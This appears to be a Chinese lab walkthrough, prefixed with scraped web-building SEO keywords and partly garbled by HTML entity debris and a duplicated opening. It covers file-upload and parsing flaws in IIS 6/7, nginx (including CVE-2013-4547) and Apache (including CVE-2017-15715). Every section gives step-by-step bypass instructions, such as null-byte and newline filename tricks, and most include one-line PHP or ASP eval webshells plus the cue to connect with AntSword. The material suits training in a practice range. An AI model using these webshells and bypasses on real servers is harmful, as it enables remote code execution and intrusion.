wordpress免费建站教程,小程序网,学校网站建设目的是什么,咸阳学校网站建设报价一#xff1a;IIS
less-1 IIS6.X
步骤一#xff1a;在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 步骤二#xff1a;在x.asp中新建⼀个.txt⽂件,内容为%now()% asp代码,更改后缀为jpg 步骤三#xff1a;在外部浏览器进行访问Window2003的ip/x.asp/1.jpg#xff0…一IIS
less-1 IIS6.X
步骤一在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件 步骤二在x.asp中新建⼀个.txt⽂件,内容为%now()% asp代码,更改后缀为jpg 步骤三在外部浏览器进行访问Window2003的ip/x.asp/1.jpg得出时间 步骤四创建2.txt 输入asp一句话木马%eval request(pass)% 更改文件名后缀为.jpg 步骤五进行访问 步骤六进行蚁剑连接 less-2 IIS7.X
步骤一配置 php.ini ⽂件将 cgi.fix_pathinfo1 取消掉...并重启.... 步骤二IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾 步骤三根目录下添加1.jpg
内容?php eval($_POST[cmd]);? 步骤四访问1.jpg/.php 步骤五进行蚁剑连接 二Nginx
less-3 nginx_parsing_vulnerability
步骤一开启靶场环境 步骤二访问靶机地址 步骤三创建lsz.jpg 步骤四进行提交 进行访问/uploadfiles/c7ca40e5b7a0bb68db13aa890567898b.jpg 后添加/.php 步骤五进行蚁剑连接 less-4 CVE-2013-4547
步骤一开启靶场环境 步骤二访问靶机并上传 shell.php 文件抓包修改⽂件后缀为.jpg在.jpg后⾯添加两个空格并给上 .php 后缀 步骤三在hex中将jpg后面第二个空格20改为00放行 步骤四访问上传后的文件抓包
/uploadfiles/shell.jpg .php 三.Apache
less-5 apache_parsing
步骤一开启靶场环境 步骤二访问靶机并上传 lsz.php.jpg 文件 进行访问/uploadfiles/lsz.php.jpg 进行访问/uploadfiles/lsz.php 步骤三进行蚁剑连接 less-6 CVE-2017-15715
步骤一开启靶场环境 步骤二访问靶场环境 步骤三访问靶机并上传 shell.jpg 文件文件内容为GIF89a ?php eval($_POST[cmd]);?,filename为1.php 步骤三抓包1.php后面加空格hex中空格20改为0a 步骤四放行访问1.php%0A 步骤五进行蚁剑连接
